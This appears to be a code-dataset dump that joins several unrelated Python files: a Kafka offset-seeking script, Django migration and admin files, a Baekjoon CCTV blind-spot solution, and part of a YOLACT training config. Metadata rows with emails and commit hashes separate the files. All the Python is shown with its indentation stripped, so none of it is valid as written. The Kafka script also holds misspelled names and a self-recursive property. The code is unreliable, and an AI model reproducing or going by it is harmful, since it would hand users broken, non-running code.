print "{} is not match format YYYY-MM-DDThh:mm:ss".format(start_datetime)
_exit(1)
else:
print "Must input the argument: -s start_datetime"
_exit(1)
if topic:
self._topic = topic
else:
print "Must input the argument: -t topic"
_exit(1)
if partition:
self._partition = self._parse_partition_string(partition)
if brokers:
self._brokers = self._parse_broker_string(brokers)
else:
print "Must input the argument: -b brokers"
_exit(1)
if seek_num:
self._seek_num = seek_num
else:
self._seek_num = 3
if path:
self.file_path = path
else:
self.file_path = None
if force:
self._force_offset = force
else:
self._force_offset = None
self._data = None
self._toparty = TopicPartition(self.topic, self._partition)
def seek_and_poll(self):
""" Wrap KafkaConsumer.seek & poll function"""
try:
if self._force_offset:
print "Using -f offset: {}".format(self._force_offset)
_tmp_offset = self._force_offset
self._start_offset = None
else:
_tmp = self.get_offset(self._start_timestamp)
self._start_offset = _tmp[self._toparty].offset
print "Using datetime to offset: {}".format(self._start_offset)
_tmp_offset = self._start_offset
self._consumer.seek(self._toparty, _tmp_offset)
if self._seek_num > -1:
self._data = self._consumer.poll(timeout_ms=3000, max_records=self._seek_num)
try:
_batch = self._data.values()[0]
_batch_size = len(_batch)
except IndexError as e:
_batch = None
_batch_size = 0
print "Polled batch size: {}".format(_batch_size)
if _batch:
if self.file_path:
if _batch_size > 0:
self._dump_to_file(mode='w', batch=_batch)
else:
print "No data to dump"
else:
self._print_record(_batch)
else:
print "offset: {} Data: None".format(_tmp_offset)
elif self._seek_num==-1:
print "seek num was set in -1, turn on unlimited mode, task start:"
self._no_data_can_be_polled = False
while not self._no_data_can_be_polled:
self._data = self._consumer.poll(timeout_ms=3000, max_records=4000)
try:
_batch = self._data.values()[0]
_batch_size = len(_batch)
except IndexError as e:
break
print "Polled batch size: {}".format(_batch_size)
if _batch_size==0:
self._no_data_can_be_polled = True
print "The task is finished"
break
else:
if self.file_path:
self._dump_to_file(mode='a', batch=_batch)
else:
self._print_record(_batch)
time.sleep(0.5)
else:
print "Illegal seek number was found: {}, exit".format(self._seek_num)
_exit(1)
except KafkaTimeoutError as e:
print str(e)
_exit(1)
except NoBrokersAvailable as e:
print str(e)
_exit(1)
def connect_borkers(self):
try:
print "Connecting to kafka brokers: {}...".format(self._brokers),
self._consumer = KafkaConsumer(bootstrap_servers=self._brokers)
self.assign_topic()
except NoBrokersAvailable as e:
print str(e)
print "Failed, exit"
_exit(1)
print "Succeed"
def reconnect_brokers(self):
self.close()
self.connect_borkers()
def assign_topic(self):
try:
self._consumer.assign([self._toparty])
self.seek_beginning_offset()
self.seek_last_offset()
except ValueError:
print "Connection maybe closed, can not assign topic"
def _print_record(self, batch):
for _record in batch:
print "Offset:", _record.offset, ", Data:", _record.value
def _dump_to_file(self, mode, batch):
print "Dump data to {}...".format(self.file_path),
try:
with open(self.file_path, mode) as f:
for _record in batch:
f.write(_record.value + "\n")
except Exception as e:
print "Failed"
print str(e)
print "Done"
def seek_last_offset(self):
self._consumer.seek_to_end(self._toparty)
self._last_data = self._consumer.poll(timeout_ms=3000, max_records=1)
def seek_beginning_offset(self):
self._consumer.seek_to_beginning(self._toparty)
self._beginning_data = self._consumer.poll(timeout_ms=3000, max_records=1)
def _to_datetime_obj(self, datetime_string):
return datetime.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S")
@property
def file_path(self):
return self.file_path
@property
def fource(self):
return self._force_offset
@property
def start_datetime(self):
""" The start datetime in seeking data protcol"""
return self._start_datetime
@start_datetime.setter
def set_start_datetime(self, datetime):
try:
self._start_datetime = self._to_datetime_obj(datetime)
self._start_timestamp = self.datetime2timestamp(datetime)
except ValueError as e:
print "{} is not match format YYYY-MM-DDThh:mm:ss".format(datetime)
@property
def seek_num(self):
return self._seek_num
@property
def start_timestamp(self):
return self._start_timestamp
@property
def start_offset(self):
return self._start_offset
@property
def topic(self):
return self._topic
@property
def beginning_data(self):
if self._beginning_data is None:
self.seek_beginning_offset()
if self._beginning_data == {}:
return self._CR_namedtp(
topic=self._topic,
partition=self._partition,
timestamp=None,
value=None,
offset=None
)
return self._beginning_data[self._toparty][0]
@property
def last_data(self):
if self._last_data is None:
self.seek_last_offset()
if self._last_data == {}:
return self._CR_namedtp(
topic=self._topic,
partition=self._partition,
timestamp=None,
value=None,
offset=None
)
return self._last_data[self._toparty][0]
@topic.setter
def set_topic(self, topic):
self._topic = topic
self._toparty = TopicPartition(self.topic, self._partition)
self.assign_topic()
@property
def brokers(self):
return self._brokers
@brokers.setter
def set_brokers(self, brokers):
self._brokers = self_parse_broker_string(brokers)
self.reconnect_brokers()
def _parse_broker_string(self, brokers):
if isinstance(brokers, list):
return borkers
elif isinstance(brokers, str):
return [broker.strip() for broker in brokers.split(',')]
@property
def partition(self):
return self._partition
@partition.setter
def set_partition(self, partition):
self._partition = self._parse_partition_string(partition)
self._toparty = TopicPartition(self.topic, self._partition)
self.assign_topic()
def _parse_partition_string(self, partition):
if isinstance(partition, int):
return partition
elif isinstance(partition, str):
try:
return int(partition)
except ValueError as e:
print "Invalid partition string was found: {}".format(partition)
def datetime2timestamp(self, datetime_string):
time_tuple = time.strptime(datetime_string, "%Y-%m-%dT%H:%M:%S")
return time.mktime(time_tuple)
def get_offset(self, _timestamp):
try:
print "To get offset by timpstamp: {}".format(_timestamp)
return self._consumer.offsets_for_times({self._toparty:_timestamp})
except ValueError:
print "Connection maybe closed, try to reconnect"
self.connect_borkers()
return self._consumer.offsets_for_times({self._toparty:_timestamp})
def close(self):
print "Close connection"
self._consumer.close()
if __name__=="__main__":
parser = _get_parser()
args = parser.parse_args()
try:
seeker = Seeker(
start_datetime=args.start,
topic=args.topic,
brokers=args.brokers,
partition=args.partition,
seek_num=args.seek,
path=args.filepath,
force=args.offset
)
seeker.connect_borkers()
seeker.seek_and_poll()
seeker.close()
if args.output:
print "\n","===== Input information ====="
print "Input offset:", seeker.fource
print "Input datetime:", seeker.start_datetime
print "Input timpstamp:", seeker.start_timestamp
print "Datetime to offset:", seeker.start_offset
print "File path:", seeker.file_path
print "seek number:", seeker.seek_num
print "\n","===== Topic information ====="
print "Brokers:", seeker.brokers
print "Partition:", seeker.partition
print "Topic:", seeker.topic
print "Fisrt offset on kafka:", seeker.beginning_data.offset
print "Last offset on kafka:", seeker.last_data.offset
except Exception as e:
print str(e)
if args.debug:
traceback.print_exc()
_exit(0) | [
"gooa1c2e3@gmail.com"
] | gooa1c2e3@gmail.com |
687cfda74396d138edf948b2b21bcf2e39fb25ea | e1881c3a562355974cb6b96f8d06cdd97dee0d1e | /tutorials/migrations/0004_auto_20190821_1430.py | b4b93a817da4f9014f79aa1cbc444bec4da676c0 | [] | no_license | codeflamer/Anonymous-Music-App | b2b7648d49dc77d94a76660b0e28a5358ba19ef5 | 406bdfde10a9afb1437febda38904cc6070c4414 | refs/heads/master | 2020-09-13T10:24:40.049738 | 2019-11-19T17:11:49 | 2019-11-19T17:12:55 | 222,741,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # Generated by Django 2.1.2 on 2019-08-21 13:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tutorials', '0003_auto_20190820_1257'),
]
operations = [
migrations.AddField(
model_name='album',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='album',
name='artist',
field=models.CharField(help_text='Enter your artist name here', max_length=100),
),
]
| [
"emryzs01@gmail.com"
] | emryzs01@gmail.com |
18d6aa3fe977892dc48a2e42cd5f541eae5f092c | b66f24ec89be100b7a4cf74e3fad56315f75f57d | /polls/admin.py | b39b2f47084517685074659d36d71b68873bea86 | [] | no_license | lmyfzx/DjangoTest | e619a192a490f73c7922f7005a27daa839522a92 | 8a1f12a9d6bc6fcb5bbe37df8fcf89e9730e0c60 | refs/heads/master | 2020-12-03T23:49:54.371017 | 2016-09-23T08:57:35 | 2016-09-23T08:57:35 | 66,942,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.contrib import admin
# Register your models here.
from .models import Question,Choice
class ChoiceInline(admin.TabularInline):
model = Choice
extra = 2
class QuestionAdmin(admin.ModelAdmin):
fieldsets = [
(None, {'fields': ['question_text']}),
('日期信息', {'fields': ['pub_date']}),
]
inlines = [ChoiceInline]
list_display = ('question_text', 'pub_date', 'was_published_recently')
list_filter = ['pub_date']
search_fields = ['question_text']
admin.site.register(Question,QuestionAdmin) | [
"lmyfzx@qq.com"
] | lmyfzx@qq.com |
1f3f19f03def5c7a6c1e1e2eb72b4fa33bdf7c50 | 6b5572557c4a0785c4b727ee024790ec066ad6f2 | /Baekjoon/삼성 SW 역량 테스트 기출 문제/감시.py | 17577c83e70a00bb1a4e4811333b625744615101 | [] | no_license | easternpillar/AlgorithmTraining | 5be38998dc062d1d02933f61eaca3265e1b73981 | c8f05eda86161a7dbacab99154be1af292e7db8a | refs/heads/master | 2023-04-29T11:13:34.984005 | 2023-04-08T07:12:29 | 2023-04-08T07:12:29 | 231,875,419 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,986 | py | # Problem:
# Given the structure of office, return the minimum number of blind spots.
# My Solution:
from collections import deque
import copy
def camera1(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera2(o, pos):
temp = copy.deepcopy(o)
re = []
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera3(o, pos):
re = []
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera4(o, pos):
re = []
# 오른쪽, 위, 왼쪽
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 오른쪽, 아래, 왼쪽
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 왼쪽, 위, 아래
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
# 오른쪽, 위, 아래
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
re.append(temp)
return re
def camera5(o, pos):
temp = copy.deepcopy(o)
r, c = pos[0], pos[1]
while r > 0:
r -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c > 0:
c -= 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while c < len(temp[0]) - 1:
c += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
r, c = pos[0], pos[1]
while r < len(temp) - 1:
r += 1
if temp[r][c] == 6:
break
if temp[r][c] == 0:
temp[r][c] = '#'
else:
continue
return temp
r, c = map(int, input().split())
office = [list(map(int, list(input().split()))) for _ in range(r)]
origin=0
for i in range(len(office)):
for j in range(len(office[i])):
if office[i][j]==0:
origin+=1
offices = deque([office])
cam = deque()
for i in range(r):
for j in range(c):
if 1 <= office[i][j] <= 5:
cam.append([i, j])
answer=set()
while cam:
c = cam.popleft()
x, y = c[0], c[1]
new_office = []
while offices:
o = offices.popleft()
if o[x][y] == 1:
new_office.extend(camera1(o, [x, y]))
elif o[x][y] == 2:
new_office.extend(camera2(o, [x, y]))
elif o[x][y] == 3:
new_office.extend(camera3(o, [x, y]))
elif o[x][y] == 4:
new_office.extend(camera4(o, [x, y]))
else:
new_office.append(camera5(o, [x, y]))
offices.extend(new_office)
if not cam:
while offices:
temp=offices.popleft()
cnt=0
for i in range(len(temp)):
for j in range(len(temp[i])):
if temp[i][j]==0:
cnt+=1
answer.add(cnt)
break
if answer:
print(min(answer))
else:
print(origin) | [
"roh941129@gmail.com"
] | roh941129@gmail.com |
9b16e0d0632a907a965a739e5db1e58f79447655 | f5bd0ef83daf74264c096ad0570142fd97ac1548 | /data/config.py | 9aac56412c8a78e334b7676529945550693ccb03 | [
"MIT"
] | permissive | SHIVAM3052/Yolact | 67ee667486314d78a3533bc175977eabd86612b3 | 2802a8ee4f6036a2c85d0f348766307e55c910a2 | refs/heads/main | 2023-07-28T10:15:29.919702 | 2021-09-08T15:36:44 | 2021-09-08T15:36:44 | 404,216,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 49,855 | py | from backbone import ResNetBackbone, VGGBackbone, ResNetBackboneGN, DarkNetBackbone
from math import sqrt
import torch
# for making bounding boxes pretty
COLORS = ((244, 67, 54),
(233, 30, 99),
(156, 39, 176),
(103, 58, 183),
( 63, 81, 181),
( 33, 150, 243),
( 3, 169, 244),
( 0, 188, 212),
( 0, 150, 136),
( 76, 175, 80),
(139, 195, 74),
(205, 220, 57),
(255, 235, 59),
(255, 193, 7),
(255, 152, 0),
(255, 87, 34),
(121, 85, 72),
(158, 158, 158),
( 96, 125, 139))
# These are in BGR and are for ImageNet
MEANS = (103.94, 116.78, 123.68)
STD = (57.38, 57.12, 58.40)
COCO_CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven',
'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',
'scissors', 'teddy bear', 'hair drier', 'toothbrush')
COCO_LABEL_MAP = { 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8,
9: 9, 10: 10, 11: 11, 13: 12, 14: 13, 15: 14, 16: 15, 17: 16,
18: 17, 19: 18, 20: 19, 21: 20, 22: 21, 23: 22, 24: 23, 25: 24,
27: 25, 28: 26, 31: 27, 32: 28, 33: 29, 34: 30, 35: 31, 36: 32,
37: 33, 38: 34, 39: 35, 40: 36, 41: 37, 42: 38, 43: 39, 44: 40,
46: 41, 47: 42, 48: 43, 49: 44, 50: 45, 51: 46, 52: 47, 53: 48,
54: 49, 55: 50, 56: 51, 57: 52, 58: 53, 59: 54, 60: 55, 61: 56,
62: 57, 63: 58, 64: 59, 65: 60, 67: 61, 70: 62, 72: 63, 73: 64,
74: 65, 75: 66, 76: 67, 77: 68, 78: 69, 79: 70, 80: 71, 81: 72,
82: 73, 84: 74, 85: 75, 86: 76, 87: 77, 88: 78, 89: 79, 90: 80}
# ----------------------- CONFIG CLASS ----------------------- #
class Config(object):
"""
Holds the configuration for anything you want it to.
To get the currently active config, call get_cfg().
To use, just do cfg.x instead of cfg['x'].
I made this because doing cfg['x'] all the time is dumb.
"""
def __init__(self, config_dict):
for key, val in config_dict.items():
self.__setattr__(key, val)
def copy(self, new_config_dict={}):
"""
Copies this config into a new config object, making
the changes given by new_config_dict.
"""
ret = Config(vars(self))
for key, val in new_config_dict.items():
ret.__setattr__(key, val)
return ret
def replace(self, new_config_dict):
"""
Copies new_config_dict into this config object.
Note: new_config_dict can also be a config object.
"""
if isinstance(new_config_dict, Config):
new_config_dict = vars(new_config_dict)
for key, val in new_config_dict.items():
self.__setattr__(key, val)
def print(self):
for k, v in vars(self).items():
print(k, ' = ', v)
# ----------------------- DATASETS ----------------------- #
dataset_base = Config({
'name': 'Base Dataset',
# Training images and annotations
'train_images': './data/coco/images/',
'train_info': 'path_to_annotation_file',
# Validation images and annotations.
'valid_images': './data/coco/images/',
'valid_info': 'path_to_annotation_file',
# Whether or not to load GT. If this is False, eval.py quantitative evaluation won't work.
'has_gt': True,
# A list of names for each of you classes.
'class_names': COCO_CLASSES,
# COCO class ids aren't sequential, so this is a bandage fix. If your ids aren't sequential,
# provide a map from category_id -> index in class_names + 1 (the +1 is there because it's 1-indexed).
# If not specified, this just assumes category ids start at 1 and increase sequentially.
'label_map': None
})
coco2014_dataset = dataset_base.copy({
'name': 'COCO 2014',
'train_info': './data/coco/annotations/instances_train2014.json',
'valid_info': './data/coco/annotations/instances_val2014.json',
'label_map': COCO_LABEL_MAP
})
coco2017_dataset = dataset_base.copy({
'name': 'COCO 2017',
'train_info': './data/coco/annotations/instances_train2017.json',
'valid_info': './data/coco/annotations/instances_val2017.json',
'label_map': COCO_LABEL_MAP
})
coco2017_testdev_dataset = dataset_base.copy({
'name': 'COCO 2017 Test-Dev',
'valid_info': './data/coco/annotations/image_info_test-dev2017.json',
'has_gt': False,
'label_map': COCO_LABEL_MAP
})
# This should be used for the pretrained model on the whole 80 classes COCO.
coco2017_dataset_person_1 = dataset_base.copy({
'name': 'COCO 2017 Person',
'train_info': './data/coco/annotations/instances_train2017_person.json',
'valid_info': './data/coco/annotations/instances_val2017_person.json',
'label_map': COCO_LABEL_MAP
})
# This should be used for a model trained only on the person class.
coco2017_dataset_person_2 = dataset_base.copy({
'name': 'COCO 2017 Person',
'train_info': './data/coco/annotations/instances_train2017_person.json',
'valid_info': './data/coco/annotations/instances_val2017_person.json',
'class_names': ('person',)
})
ochuman_dataset = dataset_base.copy({
'name': 'OCHuman',
'train_info': './data/coco/annotations/ochuman_coco.json',
'valid_info': './data/coco/annotations/instances_val2017_person.json',
'label_map': COCO_LABEL_MAP
})
cityscapes_dataset = dataset_base.copy({
'name': 'Cityscapes',
'train_info': './data/cityscapes/annotations/instancesonly_filtered_gtFine_train.json',
'valid_info': './data/cityscapes/annotations/instancesonly_filtered_gtFine_val.json',
'train_images': './data/cityscapes/images/',
'valid_images': './data/cityscapes/images/',
'label_map': COCO_LABEL_MAP
})
PASCAL_CLASSES = ("aeroplane", "bicycle", "bird", "boat", "bottle",
"bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant",
"sheep", "sofa", "train", "tvmonitor")
pascal_sbd_dataset = dataset_base.copy({
'name': 'Pascal SBD 2012',
'train_images': './data/sbd/img',
'valid_images': './data/sbd/img',
'train_info': './data/sbd/pascal_sbd_train.json',
'valid_info': './data/sbd/pascal_sbd_val.json',
'class_names': PASCAL_CLASSES,
})
person_dataset = dataset_base.copy({ 'name' : 'Person',
'valid_info': '/content/drive/MyDrive/Yolact_train/yolact/validation_data/val_person.json',
'valid_images':'/content/drive/MyDrive/Yolact_train/yolact/validation_data/images/',
'train_images':'/content/drive/MyDrive/Yolact_train/yolact/Training_data/images/',
'train_info':'/content/drive/MyDrive/Yolact_train/yolact/Training_data/person.json',
'has_gt': True,
'class_names':('person',),
'label_map':{1:1}
})
shivam_dataset = dataset_base.copy({ 'name' : 'agfields_singleclass',
'valid_info': '/content/drive/MyDrive/Yolact_train/data/annotations/val2016.json',
'valid_images':'/content/drive/MyDrive/Yolact_train/data/images/val2016/',
'train_images':'/content/drive/MyDrive/Yolact_train/data/images/train2016/',
'train_info':'/content/drive/MyDrive/Yolact_train/data/annotations/train2016.json',
'has_gt': True,
'class_names':('agfields_singleclass',),
'label_map':{1:1}
})
# ----------------------- TRANSFORMS ----------------------- #
resnet_transform = Config({
'channel_order': 'RGB',
'normalize': True,
'subtract_means': False,
'to_float': False,
})
vgg_transform = Config({
# Note that though vgg is traditionally BGR,
# the channel order of vgg_reducedfc.pth is RGB.
'channel_order': 'RGB',
'normalize': False,
'subtract_means': True,
'to_float': False,
})
darknet_transform = Config({
'channel_order': 'RGB',
'normalize': False,
'subtract_means': False,
'to_float': True,
})
# ----------------------- BACKBONES ----------------------- #
backbone_base = Config({
'name': 'Base Backbone',
'path': 'path/to/pretrained/weights',
'type': object,
'args': tuple(),
'transform': resnet_transform,
'selected_layers': list(),
'pred_scales': list(),
'pred_aspect_ratios': list(),
'use_pixel_scales': False,
'preapply_sqrt': True,
'use_square_anchors': False,
})
resnet101_backbone = backbone_base.copy({
'name': 'ResNet101',
'path': 'resnet101_reducedfc.pth',
'type': ResNetBackbone,
'args': ([3, 4, 23, 3],),
'transform': resnet_transform,
'selected_layers': list(range(2, 8)),
'pred_scales': [[1]]*6,
'pred_aspect_ratios': [ [[0.66685089, 1.7073535, 0.87508774, 1.16524493, 0.49059086]] ] * 6,
})
resnet101_gn_backbone = backbone_base.copy({
'name': 'ResNet101_GN',
'path': 'R-101-GN.pkl',
'type': ResNetBackboneGN,
'args': ([3, 4, 23, 3],),
'transform': resnet_transform,
'selected_layers': list(range(2, 8)),
'pred_scales': [[1]]*6,
'pred_aspect_ratios': [ [[0.66685089, 1.7073535, 0.87508774, 1.16524493, 0.49059086]] ] * 6,
})
resnet101_dcn_inter3_backbone = resnet101_backbone.copy({
'name': 'ResNet101_DCN_Interval3',
'args': ([3, 4, 23, 3], [0, 4, 23, 3], 3),
})
resnet50_backbone = resnet101_backbone.copy({
'name': 'ResNet50',
'path': 'resnet50-19c8e357.pth',
'type': ResNetBackbone,
'args': ([3, 4, 6, 3],),
'transform': resnet_transform,
})
resnet50_dcnv2_backbone = resnet50_backbone.copy({
'name': 'ResNet50_DCNv2',
'args': ([3, 4, 6, 3], [0, 4, 6, 3]),
})
darknet53_backbone = backbone_base.copy({
'name': 'DarkNet53',
'path': 'darknet53.pth',
'type': DarkNetBackbone,
'args': ([1, 2, 8, 8, 4],),
'transform': darknet_transform,
'selected_layers': list(range(3, 9)),
'pred_scales': [[3.5, 4.95], [3.6, 4.90], [3.3, 4.02], [2.7, 3.10], [2.1, 2.37], [1.8, 1.92]],
'pred_aspect_ratios': [ [[1, sqrt(2), 1/sqrt(2), sqrt(3), 1/sqrt(3)][:n], [1]] for n in [3, 5, 5, 5, 3, 3] ],
})
vgg16_arch = [[64, 64],
[ 'M', 128, 128],
[ 'M', 256, 256, 256],
[('M', {'kernel_size': 2, 'stride': 2, 'ceil_mode': True}), 512, 512, 512],
[ 'M', 512, 512, 512],
[('M', {'kernel_size': 3, 'stride': 1, 'padding': 1}),
(1024, {'kernel_size': 3, 'padding': 6, 'dilation': 6}),
(1024, {'kernel_size': 1})]]
vgg16_backbone = backbone_base.copy({
'name': 'VGG16',
'path': 'vgg16_reducedfc.pth',
'type': VGGBackbone,
'args': (vgg16_arch, [(256, 2), (128, 2), (128, 1), (128, 1)], [3]),
'transform': vgg_transform,
'selected_layers': [3] + list(range(5, 10)),
'pred_scales': [[5, 4]]*6,
'pred_aspect_ratios': [ [[1], [1, sqrt(2), 1/sqrt(2), sqrt(3), 1/sqrt(3)][:n]] for n in [3, 5, 5, 5, 3, 3] ],
})
# ----------------------- MASK BRANCH TYPES ----------------------- #
mask_type = Config({
# Direct produces masks directly as the output of each pred module.
# This is denoted as fc-mask in the paper.
# Parameters: mask_size, use_gt_bboxes
'direct': 0,
# Lincomb produces coefficients as the output of each pred module then uses those coefficients
# to linearly combine features from a prototype network to create image-sized masks.
# Parameters:
# - masks_to_train (int): Since we're producing (near) full image masks, it'd take too much
# vram to backprop on every single mask. Thus we select only a subset.
# - mask_proto_src (int): The input layer to the mask prototype generation network. This is an
# index in backbone.layers. Use to use the image itself instead.
# - mask_proto_net (list<tuple>): A list of layers in the mask proto network with the last one
# being where the masks are taken from. Each conv layer is in
# the form (num_features, kernel_size, **kwdargs). An empty
# list means to use the source for prototype masks. If the
# kernel_size is negative, this creates a deconv layer instead.
# If the kernel_size is negative and the num_features is None,
# this creates a simple bilinear interpolation layer instead.
# - mask_proto_bias (bool): Whether to include an extra coefficient that corresponds to a proto
# mask of all ones.
# - mask_proto_prototype_activation (func): The activation to apply to each prototype mask.
# - mask_proto_mask_activation (func): After summing the prototype masks with the predicted
# coeffs, what activation to apply to the final mask.
# - mask_proto_coeff_activation (func): The activation to apply to the mask coefficients.
# - mask_proto_crop (bool): If True, crop the mask with the predicted bbox during training.
# - mask_proto_crop_expand (float): If cropping, the percent to expand the cropping bbox by
# in each direction. This is to make the model less reliant
# on perfect bbox predictions.
# - mask_proto_loss (str [l1|disj]): If not None, apply an l1 or disjunctive regularization
# loss directly to the prototype masks.
# - mask_proto_binarize_downsampled_gt (bool): Binarize GT after dowsnampling during training?
# - mask_proto_normalize_mask_loss_by_sqrt_area (bool): Whether to normalize mask loss by sqrt(sum(gt))
# - mask_proto_reweight_mask_loss (bool): Reweight mask loss such that background is divided by
# #background and foreground is divided by #foreground.
# - mask_proto_grid_file (str): The path to the grid file to use with the next option.
# This should be a numpy.dump file with shape [numgrids, h, w]
# where h and w are w.r.t. the mask_proto_src convout.
# - mask_proto_use_grid (bool): Whether to add extra grid features to the proto_net input.
# - mask_proto_coeff_gate (bool): Add an extra set of sigmoided coefficients that is multiplied
# into the predicted coefficients in order to "gate" them.
# - mask_proto_prototypes_as_features (bool): For each prediction module, downsample the prototypes
# to the convout size of that module and supply the prototypes as input
# in addition to the already supplied backbone features.
# - mask_proto_prototypes_as_features_no_grad (bool): If the above is set, don't backprop gradients to
# to the prototypes from the network head.
# - mask_proto_remove_empty_masks (bool): Remove masks that are downsampled to 0 during loss calculations.
# - mask_proto_reweight_coeff (float): The coefficient to multiple the forground pixels with if reweighting.
